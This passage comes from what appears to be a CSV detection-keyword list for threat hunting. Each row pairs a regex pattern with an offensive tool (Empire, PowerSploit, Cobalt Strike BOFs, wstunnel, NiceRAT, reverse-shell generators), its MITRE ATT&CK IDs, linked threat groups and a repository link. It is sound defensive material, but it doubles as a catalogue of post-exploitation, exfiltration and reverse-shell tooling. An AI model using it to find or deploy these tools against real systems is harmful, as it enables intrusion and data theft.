the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Write-Nessus-Finding*",".{0,1000}Write\-Nessus\-Finding.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Write-Nessus-Footer*",".{0,1000}Write\-Nessus\-Footer.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Write-Nessus-Header*",".{0,1000}Write\-Nessus\-Header.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Write-Output 127.0.0.1:1111*",".{0,1000}Write\-Output\s127\.0\.0\.1\:1111.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*WritePayloadDll(LPWSTR pwszDllPath)*",".{0,1000}WritePayloadDll\(LPWSTR\spwszDllPath\).{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper 
registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*WritePayloadDllTransacted*",".{0,1000}WritePayloadDllTransacted.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Write-PortscanOut*",".{0,1000}Write\-PortscanOut.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Write-ServiceBinary*",".{0,1000}Write\-ServiceBinary.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Exploit an unquoted service path vulnerability to spawn a beacon","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Write-UserAddMSI*",".{0,1000}Write\-UserAddMSI.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*writing-rootkit.txt*",".{0,1000}writing\-rootkit\.txt.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*ws://localhost:58082*",".{0,1000}ws\:\/\/localhost\:58082.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*wscript_elevator*",".{0,1000}wscript_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate 
Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*WScriptBypassUAC*",".{0,1000}WScriptBypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*wsl kali-linux*",".{0,1000}wsl\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*WSPCoerce.ex*",".{0,1000}WSPCoerce\.ex.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*WSPCoerce-main*",".{0,1000}WSPCoerce\-main.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*wstunnel client *",".{0,1000}wstunnel\sclient\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel server *",".{0,1000}wstunnel\sserver\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel* --restrict-to 127.0.0.1:22*",".{0,1000}wstunnel.{0,1000}\s\-\-restrict\-to\s127\.0\.0\.1\:22.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary 
available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel*cert.pem*",".{0,1000}wstunnel.{0,1000}cert\.pem.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel*key.pem*",".{0,1000}wstunnel.{0,1000}key\.pem.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel.exe *",".{0,1000}wstunnel\.exe\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel/pkgs/container/wstunnel*",".{0,1000}wstunnel\/pkgs\/container\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_darwin_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_darwin_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic 
over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_linux_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_linux_arm64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_arm64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_linux_armv7.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_armv7\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_windows_386.tar.gz*",".{0,1000}wstunnel_.{0,1000}_windows_386\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" 
"*wstunnel_*_windows_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_windows_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*WSUSpendu*",".{0,1000}WSUSpendu.{0,1000}","offensive_tool_keyword","WSUSpendu","At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. to demonstrate this attack.","T1563 - T1204 - T1210 - T1071","TA0001 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AlsidOfficial/WSUSpendu","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wsuxploit*",".{0,1000}wsuxploit.{0,1000}","offensive_tool_keyword","wsuxploit","This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 
'WSUSpect Compromising the Windows Enterprise via Windows Update","T1557.001 - T1557.002 - T1573 - T1210.001","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/pimps/wsuxploit","1","1","N/A","N/A","3","275","51","2022-11-25T10:04:15Z","2017-06-30T01:06:41Z" "*wts_enum_remote_processes*",".{0,1000}wts_enum_remote_processes.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","109","14","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*wtXx6sM1482OWfsMXon6Am4Hi01idvFNgog3jTCsyAA=*",".{0,1000}wtXx6sM1482OWfsMXon6Am4Hi01idvFNgog3jTCsyAA\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - 
T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*wumb0/rust_bof*",".{0,1000}wumb0\/rust_bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA*",".{0,1000}WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA*",".{0,1000}WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*www.4everproxy.com/tor-proxy*",".{0,1000}www\.4everproxy\.com\/tor\-proxy.{0,1000}","offensive_tool_keyword","4everproxy","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://www.4everproxy.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*www.exploit-db.com/download/*",".{0,1000}www\.exploit\-db\.com\/download\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*www.kali.org/get-kali/*",".{0,1000}www\.kali\.org\/get\-kali\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*www.leviathansecurity.com/blog/tunnelvision*",".{0,1000}www\.leviathansecurity\.com\/blog\/tunnelvision.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*www.nicerat.com*",".{0,1000}www\.nicerat\.com.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*www.revshells.com*",".{0,1000}www\.revshells\.com.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*www.securityfocus.com/archive/1/514379*",".{0,1000}www\.securityfocus\.com\/archive\/1\/514379.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" 